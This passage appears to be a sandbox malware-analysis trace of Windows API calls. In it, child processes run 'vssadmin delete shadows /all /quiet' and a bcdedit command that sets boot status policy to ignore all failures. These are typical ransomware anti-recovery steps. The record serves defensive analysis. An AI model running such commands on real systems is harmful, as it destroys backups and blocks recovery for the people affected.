lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=19068) returned 1 [0255.189] ReadFile (hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0) Thread: id = 35 os_tid = 0x904 Process: id = "2" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x4816a000" os_pid = "0x830" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x618" cmd_line = " delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 2 os_tid = 0x324 Thread: id = 3 os_tid = 0xa9c Thread: id = 6 os_tid = 0x568 Thread: id = 8 os_tid = 0x7b8 Thread: id = 9 os_tid = 0x71c Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x4881c000" os_pid = "0x434" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x618" cmd_line = "\"C:\\Windows\\sysnative\\cmd.exe\" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" 
[0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 10 os_tid = 0x7a8 [0113.792] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efc50 | out: lpSystemTimeAsFileTime=0x2efc50*(dwLowDateTime=0x2cc3f2c0, dwHighDateTime=0x1d5f7c9)) [0113.792] GetCurrentProcessId () returned 0x434 [0113.792] GetCurrentThreadId () returned 0x7a8 [0113.792] GetTickCount () returned 0x114a2b6 [0113.792] QueryPerformanceCounter (in: lpPerformanceCount=0x2efc58 | out: lpPerformanceCount=0x2efc58*=21981550621) returned 1 [0113.800] GetModuleHandleW (lpModuleName=0x0) returned 0x4abf0000 [0113.800] __set_app_type (_Type=0x1) [0113.800] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac17810) returned 0x0 [0113.800] __getmainargs (in: _Argc=0x4ac3a608, _Argv=0x4ac3a618, _Env=0x4ac3a610, _DoWildCard=0, _StartInfo=0x4ac1e0f4 | out: _Argc=0x4ac3a608, _Argv=0x4ac3a618, _Env=0x4ac3a610) returned 0 [0113.801] GetCurrentThreadId () returned 0x7a8 [0113.801] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7a8) returned 0x3c [0113.802] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0113.802] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0113.802] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0113.987] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.987] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efbe8 | out: phkResult=0x2efbe8*=0x0) returned 0x2 [0113.988] VirtualQuery (in: lpAddress=0x2efbd0, lpBuffer=0x2efb50, dwLength=0x30 | out: lpBuffer=0x2efb50*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0113.988] VirtualQuery (in: 
lpAddress=0x1f0000, lpBuffer=0x2efb50, dwLength=0x30 | out: lpBuffer=0x2efb50*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0113.988] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efb50, dwLength=0x30 | out: lpBuffer=0x2efb50*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0113.988] VirtualQuery (in: lpAddress=0x1f4000, lpBuffer=0x2efb50, dwLength=0x30 | out: lpBuffer=0x2efb50*(BaseAddress=0x1f4000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0113.988] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efb50, dwLength=0x30 | out: lpBuffer=0x2efb50*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0113.988] GetConsoleOutputCP () returned 0x1b5 [0113.988] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac2bfe0 | out: lpCPInfo=0x4ac2bfe0) returned 1 [0113.989] SetConsoleCtrlHandler (HandlerRoutine=0x4ac13184, Add=1) returned 1 [0113.989] _get_osfhandle (_FileHandle=1) returned 0x7 [0113.989] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0113.990] _get_osfhandle (_FileHandle=1) returned 0x7 [0113.990] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac1e194 | out: lpMode=0x4ac1e194) returned 1 [0113.990] _get_osfhandle (_FileHandle=1) returned 0x7 [0113.990] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0113.991] _get_osfhandle (_FileHandle=0) returned 0x3 [0113.991] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac1e198 | out: lpMode=0x4ac1e198) returned 1 [0113.991] _get_osfhandle (_FileHandle=0) returned 0x3 [0113.991] 
SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0113.991] GetEnvironmentStringsW () returned 0x4f8b60* [0113.991] GetProcessHeap () returned 0x4e0000 [0113.992] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xa7c) returned 0x4f95f0 [0113.992] FreeEnvironmentStringsW (penv=0x4f8b60) returned 1 [0113.992] GetProcessHeap () returned 0x4e0000 [0113.992] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x8) returned 0x4f89e0 [0113.992] GetEnvironmentStringsW () returned 0x4f8b60* [0113.992] GetProcessHeap () returned 0x4e0000 [0113.992] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xa7c) returned 0x4fa080 [0113.993] FreeEnvironmentStringsW (penv=0x4f8b60) returned 1 [0113.993] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeaa8 | out: phkResult=0x2eeaa8*=0x44) returned 0x0 [0113.993] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x0, lpData=0x2eeac0*=0x18, lpcbData=0x2eeaa4*=0x1000) returned 0x2 [0113.993] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x4, lpData=0x2eeac0*=0x1, lpcbData=0x2eeaa4*=0x4) returned 0x0 [0113.993] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x0, lpData=0x2eeac0*=0x1, lpcbData=0x2eeaa4*=0x1000) returned 0x2 [0113.993] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x4, lpData=0x2eeac0*=0x0, lpcbData=0x2eeaa4*=0x4) returned 0x0 [0113.993] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, 
lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x4, lpData=0x2eeac0*=0x40, lpcbData=0x2eeaa4*=0x4) returned 0x0 [0113.993] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x4, lpData=0x2eeac0*=0x40, lpcbData=0x2eeaa4*=0x4) returned 0x0 [0113.993] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x0, lpData=0x2eeac0*=0x40, lpcbData=0x2eeaa4*=0x1000) returned 0x2 [0113.994] RegCloseKey (hKey=0x44) returned 0x0 [0113.994] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeaa8 | out: phkResult=0x2eeaa8*=0x44) returned 0x0 [0113.994] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x0, lpData=0x2eeac0*=0x40, lpcbData=0x2eeaa4*=0x1000) returned 0x2 [0113.994] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x4, lpData=0x2eeac0*=0x1, lpcbData=0x2eeaa4*=0x4) returned 0x0 [0113.994] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x0, lpData=0x2eeac0*=0x1, lpcbData=0x2eeaa4*=0x1000) returned 0x2 [0113.994] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x4, lpData=0x2eeac0*=0x0, lpcbData=0x2eeaa4*=0x4) returned 0x0 [0113.994] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x4, 
lpData=0x2eeac0*=0x9, lpcbData=0x2eeaa4*=0x4) returned 0x0 [0113.994] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x4, lpData=0x2eeac0*=0x9, lpcbData=0x2eeaa4*=0x4) returned 0x0 [0113.994] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x0, lpData=0x2eeac0*=0x9, lpcbData=0x2eeaa4*=0x1000) returned 0x2 [0113.995] RegCloseKey (hKey=0x44) returned 0x0 [0113.995] time (in: timer=0x0 | out: timer=0x0) returned 0x5e691d8d [0113.995] srand (_Seed=0x5e691d8d) [0113.995] GetCommandLineW () returned="\"C:\\Windows\\sysnative\\cmd.exe\" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures" [0113.995] GetCommandLineW () returned="\"C:\\Windows\\sysnative\\cmd.exe\" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures" [0113.995] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac2c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0113.996] GetProcessHeap () returned 0x4e0000 [0113.996] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x218) returned 0x4fab10 [0113.996] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4fab20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0113.996] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0113.996] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0113.996] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0113.997] 
_wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0113.997] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0113.997] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0113.997] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0113.997] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0113.997] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0113.997] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0113.997] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0113.997] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0113.997] GetProcessHeap () returned 0x4e0000 [0113.997] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f95f0 | out: hHeap=0x4e0000) returned 1 [0113.997] GetEnvironmentStringsW () returned 0x4f8b60* [0113.997] GetProcessHeap () returned 0x4e0000 [0113.997] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xa94) returned 0x4fad30 [0113.998] FreeEnvironmentStringsW (penv=0x4f8b60) returned 1 [0113.998] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0113.998] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0113.998] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0113.998] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0113.998] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0113.998] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0113.998] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0113.998] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0113.998] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0113.999] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0113.999] GetProcessHeap () returned 0x4e0000 [0113.999] RtlAllocateHeap 
(HeapHandle=0x4e0000, Flags=0x8, Size=0x5c) returned 0x4fb7d0 [0113.999] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef8b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0113.999] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef8b0, lpFilePart=0x2ef890 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ef890*="Desktop") returned 0x25 [0113.999] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0113.999] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef5c0 | out: lpFindFileData=0x2ef5c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x4fb840 [0114.000] FindClose (in: hFindFile=0x4fb840 | out: hFindFile=0x4fb840) returned 1 [0114.000] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ef5c0 | out: lpFindFileData=0x2ef5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4fb840 [0114.000] FindClose (in: hFindFile=0x4fb840 | out: hFindFile=0x4fb840) returned 1 [0114.000] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0114.000] 
FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ef5c0 | out: lpFindFileData=0x2ef5c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x218e9fe0, ftLastAccessTime.dwHighDateTime=0x1d5f7c9, ftLastWriteTime.dwLowDateTime=0x218e9fe0, ftLastWriteTime.dwHighDateTime=0x1d5f7c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x4fb840 [0114.000] FindClose (in: hFindFile=0x4fb840 | out: hFindFile=0x4fb840) returned 1 [0114.001] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0114.001] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0114.001] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0114.001] GetProcessHeap () returned 0x4e0000 [0114.001] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fad30 | out: hHeap=0x4e0000) returned 1 [0114.001] GetEnvironmentStringsW () returned 0x4fb840* [0114.001] GetProcessHeap () returned 0x4e0000 [0114.001] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xae8) returned 0x4fc330 [0114.002] FreeEnvironmentStringsW (penv=0x4fb840) returned 1 [0114.002] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac2c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.002] GetProcessHeap () returned 0x4e0000 [0114.002] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fb7d0 | out: hHeap=0x4e0000) returned 1 [0114.002] GetProcessHeap () returned 0x4e0000 [0114.002] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x4016) returned 0x4fce20 [0114.002] GetProcessHeap () returned 0x4e0000 [0114.003] RtlAllocateHeap (HeapHandle=0x4e0000, 
Flags=0x8, Size=0x88) returned 0x4f9650 [0114.003] GetProcessHeap () returned 0x4e0000 [0114.003] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fce20 | out: hHeap=0x4e0000) returned 1 [0114.003] GetConsoleOutputCP () returned 0x1b5 [0114.003] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac2bfe0 | out: lpCPInfo=0x4ac2bfe0) returned 1 [0114.003] GetUserDefaultLCID () returned 0x409 [0114.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac27b50, cchData=8 | out: lpLCData=":") returned 2 [0114.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef9c0, cchData=128 | out: lpLCData="0") returned 2 [0114.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef9c0, cchData=128 | out: lpLCData="0") returned 2 [0114.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef9c0, cchData=128 | out: lpLCData="1") returned 2 [0114.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac3a740, cchData=8 | out: lpLCData="/") returned 2 [0114.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac3a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0114.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac3a460, cchData=32 | out: lpLCData="Tue") returned 4 [0114.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac3a420, cchData=32 | out: lpLCData="Wed") returned 4 [0114.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac3a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0114.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac3a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0114.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac3a360, cchData=32 | out: lpLCData="Sat") returned 4 [0114.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac3a700, cchData=32 | out: lpLCData="Sun") returned 4 [0114.005] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac27b40, cchData=8 | out: lpLCData=".") returned 2 [0114.005] 
GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac3a4e0, cchData=8 | out: lpLCData=",") returned 2 [0114.006] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0114.007] GetProcessHeap () returned 0x4e0000 [0114.007] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x20c) returned 0x4f9750 [0114.007] GetConsoleTitleW (in: lpConsoleTitle=0x4f9750, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\sysnative\\cmd.exe") returned 0x1c [0114.008] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0114.008] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0114.008] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0114.008] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0114.009] GetProcessHeap () returned 0x4e0000 [0114.009] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x4012) returned 0x4fce20 [0114.009] GetProcessHeap () returned 0x4e0000 [0114.009] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fce20 | out: hHeap=0x4e0000) returned 1 [0114.011] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0114.011] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0114.011] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0114.011] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0114.011] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0114.011] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0114.011] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0114.011] GetProcessHeap () returned 0x4e0000 [0114.011] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xb0) returned 0x4f9970 [0114.012] GetProcessHeap () returned 0x4e0000 [0114.012] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x20) returned 0x4f4690 [0114.015] GetProcessHeap () returned 0x4e0000 [0114.015] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, 
Size=0x76) returned 0x4f9a30 [0114.017] GetConsoleTitleW (in: lpConsoleTitle=0x2ef8d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\sysnative\\cmd.exe") returned 0x1c [0114.018] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0114.018] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0114.018] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0114.018] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0114.018] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0114.018] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0114.018] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0114.018] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0114.019] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0114.019] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0114.019] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0114.019] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0114.019] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0114.019] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0114.019] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0114.019] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0114.019] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0114.019] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0114.019] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0114.019] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0114.019] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0114.019] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0114.019] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0114.020] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0114.020] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0114.020] _wcsicmp (_String1="bcdedit", _String2="VER") 
returned -20 [0114.020] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0114.020] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0114.020] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0114.020] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0114.020] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0114.020] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0114.020] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0114.020] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0114.020] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0114.020] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0114.020] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0114.020] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0114.020] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0114.020] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0114.020] _wcsicmp (_String1="bcdedit", 